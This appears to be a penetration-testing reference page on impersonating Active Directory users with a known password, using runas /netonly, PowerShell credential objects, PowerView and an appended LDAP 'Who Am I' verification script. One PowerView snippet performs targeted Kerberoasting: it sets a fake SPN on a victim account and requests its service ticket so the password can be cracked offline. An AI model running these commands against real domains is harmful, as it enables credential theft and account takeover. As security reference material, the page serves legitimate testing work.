Impersonation
- plaintext password: the techniques listed below
RunAs is a standard Windows command that executes a program under a different user account. When supplying an Active Directory account's password, the /netonly flag must be set to indicate the credentials are to be used for remote access only: the local process keeps the current user's token, while network authentications (SMB, LDAP, etc.) are performed with the supplied credentials.

```
runas /netonly /user:$DOMAIN\$USER "powershell.exe"
```

Since the password cannot be supplied as an argument (runas prompts for it), the session must be interactive.
In PowerShell, it is possible to impersonate a user by creating a credential object and passing it through the -Credential parameter of the next command.

```powershell
# Credential object creation (prompted)
$credential = Get-Credential
# Credential object creation (not prompted)
$password = ConvertTo-SecureString 'password_of_user_to_run_as' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential('FQDN.DOMAIN\user_to_run_as', $password)
# Usage
Start-Process Notepad.exe -Credential $credential
```
Most of PowerView's functions have the -Credential, -Domain and -Server parameters, which explicitly specify the user to run as, the target domain and the target Domain Controller. As in the previous PowerShell example, the -Credential parameter has to be supplied with a credential object (the same variable must be used when creating the object and when passing it).

```powershell
# Credential object creation (not prompted)
$password = ConvertTo-SecureString 'password_of_user_to_run_as' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential('FQDN.DOMAIN\user_to_run_as', $password)
# Usage
Set-DomainObject -Credential $credential -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' -Identity 'victimuser' -Set @{serviceprincipalname='nonexistant/BLAHBLAH'}
$User = Get-DomainUser -Credential $credential -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' 'victimuser'
$User | Get-DomainSPNTicket -Credential $credential -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' | fl
```
SharpLdapWhoami can then be used to make sure the user is correctly impersonated. A standard whoami command only returns the local session's user, not the identity used for remote operations (such as LDAP queries to the DC).

```
.\SharpLdapWhoami.exe
.\SharpLdapWhoami.exe /method:kerberos /all
```
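The credential-object creation above and the whoami check can be combined in plain PowerShell. This added example (not from the original page, PowerView or SharpLdapWhoami) builds the credential object interactively, so the password never appears on the command line, and then asks the Domain Controller which identity it actually authenticated via the LDAP "Who Am I?" extended operation (RFC 4532). 'FQDN.DOMAIN', 'user_to_run_as' and 'Domain_Controller' are the page's placeholders; the function names are assumptions of this example.

```powershell
# Added example: build a PSCredential and verify which identity the DC sees for it.
# Server, domain and user names are placeholders; function names are this example's own.
Add-Type -AssemblyName System.DirectoryServices.Protocols

function New-RunAsCredential {
    param(
        [Parameter(Mandatory)] [string] $Domain,   # e.g. 'FQDN.DOMAIN' (placeholder)
        [Parameter(Mandatory)] [string] $User
    )
    # Prompt instead of hard-coding the password so it never lands in the console history.
    $secure = Read-Host -Prompt "Password for $Domain\$User" -AsSecureString
    return [System.Management.Automation.PSCredential]::new("$Domain\$User", $secure)
}

function Get-LdapWhoAmI {
    param(
        [Parameter(Mandatory)] [string] $Server,   # DC hostname (placeholder)
        [Parameter(Mandatory)] [System.Management.Automation.PSCredential] $Credential,
        [ValidateSet('Negotiate', 'Kerberos', 'Ntlm')] [string] $AuthType = 'Negotiate'
    )
    $id   = [System.DirectoryServices.Protocols.LdapDirectoryIdentifier]::new($Server, 389)
    $conn = [System.DirectoryServices.Protocols.LdapConnection]::new($id, $Credential.GetNetworkCredential())
    $conn.AuthType = [System.DirectoryServices.Protocols.AuthType] $AuthType
    $conn.SessionOptions.Sealing = $true   # encrypt the LDAP session instead of querying in cleartext
    $conn.SessionOptions.Signing = $true
    try {
        $conn.Bind()
        # 1.3.6.1.4.1.4203.1.11.3 is the LDAP "Who Am I?" extended operation; an AD DC answers
        # with an authzId such as "u:DOMAIN\user" for the account the bind was performed as.
        $req  = [System.DirectoryServices.Protocols.ExtendedRequest]::new('1.3.6.1.4.1.4203.1.11.3')
        $resp = [System.DirectoryServices.Protocols.ExtendedResponse] $conn.SendRequest($req)
        return [System.Text.Encoding]::UTF8.GetString($resp.ResponseValue)
    } finally {
        $conn.Dispose()
    }
}

# Usage: the returned name should be the impersonated account, not the local session's user.
$credential = New-RunAsCredential -Domain 'FQDN.DOMAIN' -User 'user_to_run_as'
Get-LdapWhoAmI -Server 'Domain_Controller' -Credential $credential
Get-LdapWhoAmI -Server 'Domain_Controller' -Credential $credential -AuthType Kerberos
```

Running the check once with Negotiate and once with Kerberos mirrors the two SharpLdapWhoami invocations above; a mismatch between the two usually points at a name-resolution or SPN problem for the Kerberos path.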